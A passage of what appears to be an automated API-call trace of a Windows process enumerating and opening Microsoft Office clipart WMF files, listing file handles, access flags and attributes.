(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.169] AreFileApisANSI () returned 1 [0104.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.169] GetFileType (hFile=0x33c) returned 0x1 [0104.169] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.169] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.169] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.169] CloseHandle (hObject=0x33c) returned 1 [0104.169] AreFileApisANSI () returned 1 [0104.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.170] GetFileType (hFile=0x33c) returned 0x1 [0104.170] CloseHandle (hObject=0x33c) returned 1 [0104.170] AreFileApisANSI () returned 1 [0104.170] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0104.170] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01186_.WMF", cAlternateFileName="")) returned 1 [0104.170] AreFileApisANSI () returned 1 [0104.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.170] AreFileApisANSI () returned 1 [0104.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.170] GetFileType (hFile=0x33c) returned 0x1 [0104.170] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.170] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.170] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.171] CloseHandle (hObject=0x33c) returned 1 [0104.171] AreFileApisANSI () returned 1 [0104.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.171] GetFileType (hFile=0x33c) returned 0x1 [0104.171] CloseHandle (hObject=0x33c) returned 1 [0104.171] AreFileApisANSI () returned 1 [0104.171] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2174)) returned 1 [0104.171] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01366_.WMF", cAlternateFileName="")) returned 1 [0104.171] AreFileApisANSI () returned 1 [0104.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.171] AreFileApisANSI () returned 1 [0104.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.171] GetFileType (hFile=0x33c) returned 0x1 [0104.171] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.172] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.172] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.172] CloseHandle (hObject=0x33c) returned 1 [0104.172] AreFileApisANSI () returned 1 [0104.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.172] GetFileType (hFile=0x33c) returned 0x1 [0104.172] CloseHandle (hObject=0x33c) returned 1 [0104.172] AreFileApisANSI () returned 1 [0104.172] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e8)) returned 1 [0104.172] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x384, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01434_.WMF", cAlternateFileName="")) returned 1 [0104.172] AreFileApisANSI () returned 1 [0104.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.172] AreFileApisANSI () returned 1 [0104.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.173] GetFileType (hFile=0x33c) returned 0x1 [0104.173] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.173] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.173] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.173] CloseHandle (hObject=0x33c) returned 1 [0104.174] AreFileApisANSI () returned 1 [0104.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.174] GetFileType (hFile=0x33c) returned 0x1 [0104.174] CloseHandle (hObject=0x33c) returned 1 [0104.174] AreFileApisANSI () returned 1 [0104.174] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x384)) returned 1 [0104.174] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9dc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01585_.WMF", cAlternateFileName="")) returned 1 [0104.174] AreFileApisANSI () returned 1 [0104.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.174] AreFileApisANSI () returned 1 [0104.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.174] GetFileType (hFile=0x33c) returned 0x1 [0104.174] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.174] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.175] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.175] CloseHandle (hObject=0x33c) returned 1 [0104.175] AreFileApisANSI () returned 1 [0104.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.175] GetFileType (hFile=0x33c) returned 0x1 [0104.175] CloseHandle (hObject=0x33c) returned 1 [0104.175] AreFileApisANSI () returned 1 [0104.175] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9dc)) returned 1 [0104.175] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x914, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01586_.WMF", cAlternateFileName="")) returned 1 [0104.175] AreFileApisANSI () returned 1 [0104.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.175] AreFileApisANSI () returned 1 [0104.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.176] GetFileType (hFile=0x33c) returned 0x1 [0104.176] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.176] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.176] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.176] CloseHandle (hObject=0x33c) returned 1 [0104.176] AreFileApisANSI () returned 1 [0104.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.176] GetFileType (hFile=0x33c) returned 0x1 [0104.176] CloseHandle (hObject=0x33c) returned 1 [0104.176] AreFileApisANSI () returned 1 [0104.176] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x914)) returned 1 [0104.176] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a7c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01628_.WMF", cAlternateFileName="")) returned 1 [0104.176] AreFileApisANSI () returned 1 [0104.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.177] AreFileApisANSI () returned 1 [0104.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.177] GetFileType (hFile=0x33c) returned 0x1 [0104.177] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.177] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.177] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.178] CloseHandle (hObject=0x33c) returned 1 [0104.178] AreFileApisANSI () returned 1 [0104.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.178] GetFileType (hFile=0x33c) returned 0x1 [0104.178] CloseHandle (hObject=0x33c) returned 1 [0104.178] AreFileApisANSI () returned 1 [0104.178] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a7c)) returned 1 [0104.178] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe736331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01629_.WMF", cAlternateFileName="")) returned 1 [0104.178] AreFileApisANSI () returned 1 [0104.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.178] AreFileApisANSI () returned 1 [0104.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.180] GetFileType (hFile=0x33c) returned 0x1 [0104.180] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.180] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.180] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.180] CloseHandle (hObject=0x33c) returned 1 [0104.180] AreFileApisANSI () returned 1 [0104.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.180] GetFileType (hFile=0x33c) returned 0x1 [0104.180] CloseHandle (hObject=0x33c) returned 1 [0104.180] AreFileApisANSI () returned 1 [0104.180] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe736331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x244)) returned 1 [0104.180] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x128, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01630_.WMF", cAlternateFileName="")) returned 1 [0104.181] AreFileApisANSI () returned 1 [0104.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.181] AreFileApisANSI () returned 1 [0104.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, 